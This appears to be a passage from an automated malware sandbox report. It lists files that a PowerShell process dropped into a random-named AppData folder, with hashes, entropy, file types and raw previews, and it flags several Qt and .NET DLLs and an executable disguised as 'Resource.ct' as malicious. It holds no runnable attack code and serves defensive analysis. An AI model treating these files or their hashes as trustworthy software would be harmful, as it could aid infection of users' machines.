File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3422
Entropy (8bit):	4.718448996775859
Encrypted:	false
SSDEEP:	24:2dgeD5eo8gWt4+3F+uAuj9hjwJd+ktkEbEqXf3XYonvxbBN9vBxWQcjtrh6kWR0z:cgeD5x8gmVSTuiv3Xv1IQcLzWElq2SIV
MD5:	224BEABEB0B0C06F17CD758D7F5CA442
SHA1:	5D6443E03F0345B93561D2958C725E963CE1EBCD
SHA-256:	C65DA0DF5066F72EFF8B61EDF4F7B900650462FE38260C98C43A2DFCBEEF8634
SHA-512:	17AD214FA68E221F9805472AB453B13477656AC0F7A1612F2260B369F2F1E33D0DCC2E03851A3CB72999F16EF790B56F2CC0E1C341723FD1BB0C6937FEA1B98D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Maintenance Scheduler Policies</displayName>.. <description>Maintenance Scheduler Group Policies</description>.. <resources>.. <stringTable>.. <string id="MaintenanceScheduler">Maintenance Scheduler</string>.. <string id="ActivationBoundary">Automatic Maintenance Activation Boundary</string>.. <string id="ActivationBoundaryHelp">.. This policy setting allows you to configure Automatic Maintenance activation boundary..... The maintenance activation boundary is the daily schduled time at which Automatic Maintenance starts.... If you enable this policy setting, this will override the default daily scheduled time

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\nca.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 text, with very long lines (532), with CRLF line terminators
Category:	dropped
Size (bytes):	8481
Entropy (8bit):	4.839330009877803
Encrypted:	false
SSDEEP:	192:xvEwDvJfTqcK3KoGmwrtrqGryq5hP8lv5UNgTe:xvE8fWVQpHOq5hP8vuge
MD5:	913C464CFBD79FBB24DDDB6A91D1C375
SHA1:	DE4AB693B5B746695B00E6F00EFC190D7541242F
SHA-256:	6E3E490033E86709BBEAD8A1CA4F35DD478297BD932A76C3D9942DD59F8AC27F
SHA-512:	346C4AA6FBC299ECC94C2CA4970A4EC4867235FD9268E4E89C2F32D526A1F75824565442B555080CD374C229D6C5ECFD2CF6B7B96DC85FCABD14F9225FE05CEB
Malicious:	false
Preview:	<policyDefinitionResources revision="1.0" schemaVersion="1.0">.. <displayName>DirectAccess Client Experience Settings Group Policy Template</displayName>.. <description>This admx file describes policy template for DirectAccess Client NCA component</description>.. <resources>.. <stringTable>.. <string id="NCA">DirectAccess Client Experience Settings</string>.. <string id="NCA_Help">This is the group policy template for DirectAccess Client Experience Settings. Please read the DirectAccess deployment guide for more information.</string>.. <string id="SupportEmail">Support Email Address</string>.. <string id="SupportEmail_Help">Specifies the e-mail address to be used when sending the log files that are generated by NCA to the network administrator. ....When the user sends the log files to the Administrator, NCA uses the default e-mail client to open a new message with the support email address in the To: field of the message, then attaches the generated log files

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\pca.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (379), with CRLF line terminators
Category:	dropped
Size (bytes):	6236
Entropy (8bit):	4.8210465928673445
Encrypted:	false
SSDEEP:	96:LeD5pm0ybro3NXRz6/LPrwwfsHO+/7Oaj3V:EDyXo3NXRz+0w0HdjtjF
MD5:	78021A8DEB0981DD65154025032BB7D5
SHA1:	5B59F46A232E9752D6405949564B435D1AD709B5
SHA-256:	899C5FF462E34E8319AC0C59A9BC794695166970BA28495C473754FA5C3DE457
SHA-512:	C4BBA2C6A05B10A74D603225CE69BF6EC3D08CF8039D56E5118774179A628A237F9119C09215C4FEB7BE5D5D06A8E5CF6B07FE2822D0AF7E65FEFD47FA9E039E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>...... Overall category text -->.. <string id="PcaScenarioCategory">Application Compatibility Diagnostics</string>.. .... Generic WDI text -->.. <string id="WdiScenarioExecutionPolicyLevelResolution">Detection, Troubleshooting and Resolution</string>.. <string id="WdiScenarioExecutionPolicyLevelTsOnly">Detection and Troubleshooting Only</string>...... Individual scenario text -->.. <string id="DetectBlockedDriversText">Notify blocked drivers</string>.. <string id="DetectDepre

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\sdiageng.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (423), with CRLF line terminators
Category:	dropped
Size (bytes):	3289
Entropy (8bit):	4.684667062227081
Encrypted:	false
SSDEEP:	48:cVD5x8gmnwOx5XzQfO4ZQZr4VdF+kHdqblrmG7FV:WD5pmnwOX4aadF+odcmG7FV
MD5:	145EB767DFAAC5B7D79A9DF8C4FD6504
SHA1:	EF931F6BD052785B77B640F310BB593DA3FBC881
SHA-256:	F2483555C3531D0821703D3696ACBFE5528A031D762661249CD6DF8434ACCFC3
SHA-512:	8B5AC9ABF5870C9F2D9708E8858121815CE875E379700E7E4797F84631802D82FFE0A32C1983CF23BD6B09D775965F0192939D03CAC6F1E5FD2B54CC55EE2602
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Scripted Diagnostics</displayName>.. <description>Scripted Diagnostics</description>.. <resources>.. <stringTable>.. <string id="ScriptedDiagnosticsCategory">Scripted Diagnostics</string>.. <string id="ScriptedDiagnosticsSecurityPolicy">Configure Security Policy for Scripted Diagnostics</string>.. <string id="ScriptedDiagnosticsSecurityPolicyExplain">This policy setting determines whether scripted diagnostics will execute diagnostic packages that are signed by untrusted publishers.....If you enable this policy setting, the scripted diagnostics execution engine validates the signer of any diagnostic package and runs only those signed by trust

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\srm-fci.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (472), with CRLF line terminators
Category:	dropped
Size (bytes):	7668
Entropy (8bit):	4.73074137043816
Encrypted:	false
SSDEEP:	96:wNa+/IQexYsInNwFxpeHe+zpoDQzwvU9Q7nwefXvU9Q7HTV:G/In5xpe++zpoDhv8w/v80
MD5:	7B04E3F4356B26D851628246DAC94705
SHA1:	AB5AC1954A3652BCB12946B607C2B1F4D876DA21
SHA-256:	E6F4193F29666226D72365C364E473F1F9DEB47405DFEDCA38A215EB61FFF967
SHA-512:	E1A0C7A200AEDCD3FB55E64BF67A0EE9EED91C0632C178A54FA98E20D9B4C32680F17900BC66017FEF3F595A6FCA06624B2C0CF7D5B4E8490C177F3AFAC1A414
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>File Classification Infrastructure Group Policy Definitions</displayName>.. <description></description>.. <resources>.. <stringTable>.. <string id="AdrCat">Access-Denied Assistance</string>.. <string id="FciCat">File Classification Infrastructure</string>.. <string id="EnableManualUXDisplay">File Classification Infrastructure: Display Classification tab in File Explorer</string>.. <string id="EnableShellExecuteFileStreamCheck">Enable access-denied assistance on client for all file types</string>.. <string id="EnableShellExecuteFileStreamCheck_Descr">This Group Policy Setting should be set on Windows clients to enable access-denied assistance for all file types</string>.. <string id="EnableManualUXExplain">This policy setting controls whether the Classification

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\tcpip.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (431), with CRLF line terminators
Category:	dropped
Size (bytes):	13466
Entropy (8bit):	4.782394839113498
Encrypted:	false
SSDEEP:	96:LeD5pmjKFPT4fv3EIrv3Iv/g8/vRzZxOkRvhRkKSbHw1cZICCHzBaTBeQqqL7tgA:E6fv3EWv3Ivo8Fn/nYwrqjvigA95Zy/D
MD5:	0B0DA2277FE7B257B26ED87E595CDCF5
SHA1:	5F790C95E1703A243F0678FDF521772811B4D352
SHA-256:	89EC65C0144936DE7A31B903D9A8DBD2E436FD098DE9AA91EAF164A5A8B6DB1B
SHA-512:	581018F7E5E6ACFBB4D7E8B6BDADCA26ABE829ED1E12AAF1B86FB70857DF9B2290056B3890E969A62DA027399FA4624E1B9478679B91632AD1CE12D1A09D0250
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>TCPIP Group Policy Template file</displayName>.. <description>This admx file describes policy template for TCPIP components</description>.. <resources>.. <stringTable>.. <string id="TCPIP">TCPIP Settings</string>.. <string id="Ipv6Transition">IPv6 Transition Technologies</string>.... <string id="ISATAP_State">Set ISATAP State</string>.. <string id="ISATAP_Router_Name">Set ISATAP Router Name</string>.. <string id="6to4_State">Set 6to4 State</string>.. <string id="6to4_Router_Name">Set 6to4 Relay Name</string>.. <string id="6to4_Router_Name_Resolution_Interval">Set 6to4 Relay Name Resolution Interval</string>.. <s

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\wlansvc.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1977
Entropy (8bit):	4.903195660648944
Encrypted:	false
SSDEEP:	48:cwD5x8gmipnasavWANaqwDtCsiFsaMQnV:lD5pmipasavWuaqwhsFsaM0V
MD5:	13E20C78E89E7FC58934BCFF584E12A1
SHA1:	52DCC829C427CE609034C9106460C7734BEBD3ED
SHA-256:	A59E2ED355AC803474C9EF02A60076BB98ADBB33AD6AA6884AB1B4850BAC4C02
SHA-512:	14C6DB1DCB97692D561C961A5A1A5F0F25BC6CC3CB28DC878CD46296339E16C36BA8A364BE4F80A42D2C27725BECDED3020DC68BE820F0343FE92A961F018966
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2010 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>WLAN Service Group Policy Settings</displayName>.. <description>WLAN Service Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WlanSvc_Category">WLAN Service</string>.. <string id="NetworkCost_Category">WLAN Media Cost</string>.. <string id="SetCost">Set Cost</string>.. <string id="SetCost_Help">This policy setting configures the cost of Wireless LAN (WLAN) connections on the local machine.....If this policy setting is enabled, a drop-down list box presenting possible cost values will be active. Selecting one of the following values from the list will set the cost of all WLAN connections on the local m

C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\wwansvc.adml

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2971
Entropy (8bit):	4.817228267034193
Encrypted:	false
SSDEEP:	48:cwD5x8gmL0PfvW8N0qwDtCsiFcs2mANRqwDtCsiFnMlpV:lD5pmL0PfvWq0qwhsFcs2muRqwhsFnM1
MD5:	761AF87D50F53F0CE9947B5D486C30FA
SHA1:	DC926F9449848CCE778326607BD4787ED6C80A01
SHA-256:	8F1F6C7509F5C7C27B8F6E5DCF81FB8C02AE3FFEE825F6CFA4171A712BE018D4
SHA-512:	ECCF653D5935C3777F14F08C0F5318B927E230C08AAA09DEBFD09ACA23A27B0887FE94A8670B635FD7D7B6ACCF3D3DFED2BFBCD02298A5B58089D66219A7E366
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. (c) 2010 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>WWAN Service Group Policy Settings</displayName>.. <description>WWAN Service Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WwanSvc_Category">WWAN Service</string>.. <string id="NetworkCost_Category">WWAN Media Cost</string>.. <string id="SetCost3G">Set 3G Cost</string>.. <string id="SetCost3G_Help">This policy setting configures the cost of 3G connections on the local machine.....If this policy setting is enabled, a drop-down list box presenting possible cost values will be active. Selecting one of the following values from the list will set the cost of all 3G connections on the local machine:....

C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2704792
Entropy (8bit):	6.725743776039723
Encrypted:	false
SSDEEP:	49152:ImBYJtMTl/GuTvOCnCaYXWRTDF8fLen6yfZ0rO43PSGgt2:9OC9YXeTDFWD5PZ
MD5:	449BF7A46490FA07881D969B6D52C0F1
SHA1:	E520A8318E867C7840E6DEADEF36ABCDF2894417
SHA-256:	5883D041C5F5020AC4B66314D5F89CB6331DB3C4EC1C912F72B3EBB9AA8C41E2
SHA-512:	EABAA33B037BA9F1EE874C534D85AD281985E85E1DD2C115A2693F56381A9A596F22B16938916FD34804A3D490CD0AC53A2969C5F73A923B163C5474FEA91B91
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....{.f.........." .....~ .........`........................................0s.......)...`A.........................................I'......O'.(.............q.......)..)....r..3..."'......................!'.(.... .@............R'.8............................text...u\| ......~ ................. ..`.rdata...d.... ..f.... .............@..@.data.....I...(.."....'.............@....pdata........q.......(.............@..@.gxfg....,....r.......(.............@..@.retplne......r.......(..................tls..........r.......(.............@..._RDATA........r.......(.............@..@.reloc...3....r..4....(.............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\Data\icudtl.dat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	10717680
Entropy (8bit):	6.282426578921538
Encrypted:	false
SSDEEP:	196608:WgPBhORiuQwCliXUxbblHa93Whli6Z26wO+:W8wkDliXUxbblHa93Whli6ZUF
MD5:	74BDED81CE10A426DF54DA39CFA132FF
SHA1:	EB26BCC7D24BE42BD8CFBDED53BD62D605989BBF
SHA-256:	7BF96C193BEFBF23514401F8F6568076450ADE52DD1595B85E4DFCF3DE5F6FB9
SHA-512:	BD7B7B52D31803B2D4B1FD8CB76481931ED8ABB98D779B893D3965231177BDD33386461E1A820B384712013904DA094E3CD15EE24A679DDC766132677A8BE54A
Malicious:	false
Preview:	...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html ......E.......E.......E..P/...E.../...E..P7...E...7...E...h...F...h.. F..Pi..0F......DF.....WF.....jF..P...}F.......F..`....F.......F.. ....F.......F..0....F.......G......G......(G.....;G..@...NG......aG.....tG.......G.......G..@....G.......G.......G.......G..P....G.......H.......H..P...2H......EH..`...UH......hH......yH..P....H.......H.......H..`....H.......H.......H..P....I.......I......-I..@...=I......PI......aI..@...uI.......I...0...I.. 1...I..p1...I...e...I...e...I...i...I..`i...J...i..)J...K..BJ..p...^J..."'.uJ..P.'..J....'..J...5'..J..06'..J...>'..J..P?'..K...D'..K...F'.0K...H'.IK...V'.hK....(..K....(..K..P.)..K....)..K..pW..K..P...L...*+.?L..p.+.bL....+..L...U,..L....,..L....,..L....,..L..@.,..M....,.-M..P.-.IM.. e-.`M...e-.~M...R/..M.../..M..0.0..M..@.0..M..P.0..M....0..N....0.!N...,0.9N...,0.NN..0-0.fN...-0.vN...Y0..N...Z0..N..

C:\Users\user\AppData\Roaming\VWPGdipf\Data\v8_context_snapshot.bin

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	613840
Entropy (8bit):	5.353969995543054
Encrypted:	false
SSDEEP:	6144:ti2Cr/XgXBS/YKiMpN5zzivVsTRlWxYZbAIf+jL/k5nnPo7p1KFqUg/J6:tZCr/BzOvrYs1KgJ6
MD5:	753BE41D649D31812067EC2B85C10F0E
SHA1:	769531CC83B6D5DD9ABFECFA4C2D0C4128BF42F2
SHA-256:	169FC7F80834ACF1D59B62C2ADBE6D1AD477CF2564EE84150DFFFD36CAA1CA33
SHA-512:	86D76228FD82B09529D15D35B9BD45F7E0EA7328EA984FF9E0414A05746B7853DDB2AC8537A1D46B59F4A13F471120C3A428DF28FB51FC9FACC51C5F9EF6D497
Malicious:	false
Preview:	........O.'a.c>.7.5.288.23......................................................X...,>......p4......................P....B...B..P.......`....`....`....`....`t...`x...`V...`....`...... ....y.`H...D..X!}...X!A...X!A.D. ..Q.`H...D..X!m...X!E...X!E.D. ..`H...D..X!}...X!I...X!I.D. ....`H...D..X!}...X!M...X!M.D. ..i.`....D..X!q...X!Q...X!Q.D. ....`H...D..X!}...X!U...X!U.D. ..9.`H...D..X!}...X!Y...X!Y.D. ..`H...D..X!}...X!]...X!].D. ..`H...D..X!}...X!a...X!a.D. ....`H...D..X!u...X!e...X!e.D. ..`H...D..X!}...X!i...X!i.D.(Jb....!..... ..F`....^.Q...V`.....(Jb....1..... ..F`....^......@...IDa........D`....D`....D`.....`.....D]....D`.@.....V`......WIa...........V`......WIa...........WIa...........WIa...........WIa...........V`......WIa...........WIa...........WIa...........V`......WIa...........WIa...........WIa...........WIa............L`.....HD...D...D..Qb........3......D...L.........................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\NAudio.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	519944
Entropy (8bit):	6.065481336711818
Encrypted:	false
SSDEEP:	12288:rnXnae2TPlr3zvzar5oRDaw92wP6mai9gs6CU:78lrT+r5ADakP4i9gsc
MD5:	65839A5C28A0DEE380C4EBA54E2D941F
SHA1:	AC609EA7F86FE533820B801CFE40B22F8A7A3F1B
SHA-256:	C7A4C035D89716B027F69C2CC98EAF5C44FB15B08C2EA162D793466356A35A2A
SHA-512:	E6853FF5D10D11B5333F0697DCB660A042EBEAE12EEBC84427D0B9F896CF100258E7E6D18F531AAE700C0F476F91F11DA0272E7809728DF68DA80EE560136AEB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s$............" ..0.................. ........... ....................... ...........@.................................@...O........................'..........h...T............................................ ............... ..H............text...h.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................t.......H.......,g..\P............................................................{<.....{=...V.(>.....}<.....}=......0..;........u(.....,/(?....{<....{<...o@...,.(A....{=....{=...oB..... ... )UU.Z(?....{<...oC...X )UU.Z(A....{=...oD...X.0...........r...p......%..{<..........+.....+...-.q+........+...-.&.+...+...oE....%..{=..........,.....,...-.q,........,...-.&.+...,...oE....(F...r...(....(G.....}......}....JrG..p.......(H...2.,...s....z..{....N.,...i./...s......N.,...i

C:\Users\user\AppData\Roaming\VWPGdipf\QtCore4.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2598912
Entropy (8bit):	6.604555317326718
Encrypted:	false
SSDEEP:	49152:5TFgiFpGXOENKRgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07M:5+iDaljxJsv6tWKFdu9CZgfn
MD5:	17D26D22913C19D7A93F7F6AF7EC5D95
SHA1:	0BBC1E108AF53990E4B9F2C34CBF7EFBE442BC92
SHA-256:	E18684E62B3C076B91A776B71539A8B7640932055AE0831B73AD5FEE7C5DD4E7
SHA-512:	FB2A4288BE915D7E62E6DCD1A4425A77C5DA69CC58DAA7F175B921FD017CDDB07F0D76C9016EB40475DEAD5DC7984B32B988AD6F5C5D14813B5A9E2867EB629A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&.....Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\QtGui4.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8581632
Entropy (8bit):	6.736578346160889
Encrypted:	false
SSDEEP:	98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
MD5:	831BA3A8C9D9916BDF82E07A3E8338CC
SHA1:	6C89FD258937427D14D5042736FDFCCD0049F042
SHA-256:	D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
SHA-512:	BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.\|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\QtNetwork4.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1053696
Entropy (8bit):	6.539052666912709
Encrypted:	false
SSDEEP:	12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
MD5:	8A2E025FD3DDD56C8E4F63416E46E2EC
SHA1:	5F58FEB11E84AA41D5548F5A30FC758221E9DD64
SHA-256:	52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
SHA-512:	8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...\|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\QtXml4.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	356352
Entropy (8bit):	6.447802510709224
Encrypted:	false
SSDEEP:	6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
MD5:	E9A9411D6F4C71095C996A406C56129D
SHA1:	80B6EEFC488A1BF983919B440A83D3C02F0319DD
SHA-256:	C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
SHA-512:	93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\VWPGdipf\RcClientBase.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	30512
Entropy (8bit):	6.293166408242498
Encrypted:	false
SSDEEP:	384:37VPSe+T3KkTRIjjzi3WbR1zQnSyGUvXU7Ex3dVOSRZYNyb8E9VF6IYinAM+oaua:37VPSFTamMRbzCfzZQEpYinAMxJH4
MD5:	F0739E1DB958FDE4DC6BAB9D75865191
SHA1:	FEDADBF79B594995E6C44108D6B25CDBBF05EB65
SHA-256:	27FAAC58C4EDC8FB147C9947FC9567AFD2F785B11252C2963788FD0F64F7CA42
SHA-512:	ADBF2A0B42C6043EE5C984C02FCC8815B143117FA2EE0286B048F9E90D695F74F0129240E1DE36DEA2915F1E3D31359953095E6E5497337D01F0004D443AAD10
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!..0..F...........e... ........... ...............................3....`.................................He..O....................P..0'...........d............................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............N..............@..B................\|e......H........3...1...........................................................0..H..........(...(.......,.........s..... .... .:..s....}............s....(%...V.#......>@(....o3......0..=........(+...r...po......o2....(+...r3..po......&.(+...rw..po.................))..........0..@........(6....{....%-.&+. .... .:..(....&..}........(+...r...p.o..............++.......0..7........{....,..{....o......}.....(8.......(+...r...p.o...............""......v.{......o....&.{....,..o...

C:\Users\user\AppData\Roaming\VWPGdipf\Resource.ct

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3136432
Entropy (8bit):	5.953248030549441
Encrypted:	false
SSDEEP:	49152:KQ96YdG5LJ3Z3k0jbdHMsChIiv1o/spNM:FqBkMGsCJe
MD5:	CF83372CE8462708F58817B1560E7006
SHA1:	6484FDC351661E0EC40FF6D8EF2D9C1DF2B05F1A
SHA-256:	37A5A53B7D95439B05B5E4F394DE8B931A500F6DF97AAF1A82CB8A66C11478F2
SHA-512:	D4D24CFE4819343A98D2C83F62B456E922FF88215015D6A76D230D4034B68AFBEF45E3FAD2B92B6D2DBFC2772B65C0BB91545B61BD0231C8A75C03A4146352D6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........h.......z.........@..............................0.......0...`.........................................>9#......9#.d.....)..l...@(.....HF/.h....P0..&....#.8.....................#.(...@...8............A#......*#......................text............................... ..`.rdata.../.......0..................@..@.data....<....$.......#.............@....pdata.......@(......~'.............@..@.gxfg....3... )..4...X(.............@..@.retplne.....`).......(..................tls....1....p).......(.............@....voltbl.D.....).......(.................CPADinfo8.....).......(.............@...LZMADEC.......).......(............. ..`_RDATA........).......(.............@..@malloc_h......).......(............. ..`.rsrc....l....)..n....(.............@..@.reloc...&...P0..(..../.............@..B........................................................

C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6487736
Entropy (8bit):	7.518089126573906
Encrypted:	false
